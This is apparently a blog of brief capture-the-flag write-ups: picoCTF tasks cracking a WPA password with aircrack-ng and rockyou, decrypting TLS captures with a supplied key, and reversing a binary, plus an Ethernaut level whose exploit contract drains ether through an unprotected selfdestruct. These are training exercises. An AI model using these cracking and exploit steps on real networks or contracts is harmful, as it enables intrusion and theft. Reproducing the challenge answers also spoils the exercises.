29 Sep 2022
PicoGym Exclusive / Forensics
Description
I thought that my password was super-secret, but it turns out that passwords passed over the AIR can be CRACKED, especially if I used the same wireless network password as one in the rockyou.txt credential dump.
Use this ‘pcap file’ and the rockyou wordlist. The flag should be entered in the picoCTF{XXXXXX} format.
Prereguisite
Aircrack-Ng, which is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.
Writeup
- Download the pcap file and rockyou wordlist.
- Crack
aircrack-ng -w rockyou.txt wpa-ing_out.pcap
28 Sep 2022
PicoCTF 2019 / Forensics
Description
We found this packet capture and key. Recover the flag.
Prereguisite
ssldump, which is an SSL/TLS network protocol analyzer.
Writeup
- Download packet capture and key.
ssldump -r capture.pcap -k picopico.key -d > outputvim output- Search our flag.
28 Sep 2022
PicoCTF 2019 / Forensics
Description
We found this packet capture and key. Recover the flag.
Writeup
- Download packet capture and key.
- Use Wireshark to open packet capture.
- Prefrence > Protocal > TLS > RSA key list edit > add key we download.
- Analysis TLS stream.
Reference
Decrypting TLS Streams With Wireshark: Part 1
28 Sep 2022
PicoCTF 2022 / Reverse Engineering / binary /obfuscation
Writeup
- Download the file.
- We can use
file command to check its type.
file bbbbloat
#bbbbloat: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=99c5c1ce06be240322c15bcabc3cd90318eb2003, for GNU/Linux 3.2.0, stripped
- Use IDA analysis its pseudocode. (View > Open subviews > Generate pseudocode)
- Execute file and answer 549255.
27 Sep 2022
Difficulty: 🌕🌕🌕🌑🌑
A contract creator has built a very simple token factory contract. Anyone can create new tokens with ease. After deploying the first token contract, the creator sent 0.001 ether to obtain more tokens. They have since lost the contract address.
This level will be completed if you can recover (or remove) the 0.001 ether from the lost contract address.
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import '@openzeppelin/contracts/math/SafeMath.sol';
contract Recovery {
//generate tokens
function generateToken(string memory _name, uint256 _initialSupply) public {
new SimpleToken(_name, msg.sender, _initialSupply);
}
}
contract SimpleToken {
using SafeMath for uint256;
// public variables
string public name;
mapping (address => uint) public balances;
// constructor
constructor(string memory _name, address _creator, uint256 _initialSupply) public {
name = _name;
balances[_creator] = _initialSupply;
}
// collect ether in return for tokens
receive() external payable {
balances[msg.sender] = msg.value.mul(10);
}
// allow transfers of tokens
function transfer(address _to, uint _amount) public {
require(balances[msg.sender] >= _amount);
balances[msg.sender] = balances[msg.sender].sub(_amount);
balances[_to] = _amount;
}
// clean up after ourselves
function destroy(address payable _to) public {
selfdestruct(_to);
}
}
Writeup
- Get new instance.
- Get level instance’s address.
instance
// '0x952282e64E0DE0618E337114AA315cE3eBb1351A'
- Go to etherscan search this address. We can see there’s a Contract Creation record, which we can click into and get our
SimpleToken contract address.
- Create a new contract to exploit it!
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0 <0.9.0;
interface ISimpleToken {
function destroy(address payable _to) external;
}
contract RecoveryExploit {
function withdraw() public {
ISimpleToken(YOUR_SIMPLETOKEN_ADDRESS).destroy(payable(msg.sender));
}
}
- Compile and deploy.
- Call the
withdraw method in RecoveryExploit contract. SimpleToken contract will self-destruct and all remaining ether will be sent to msg.sender.
- Submit instance ξ( ✿>◡❛)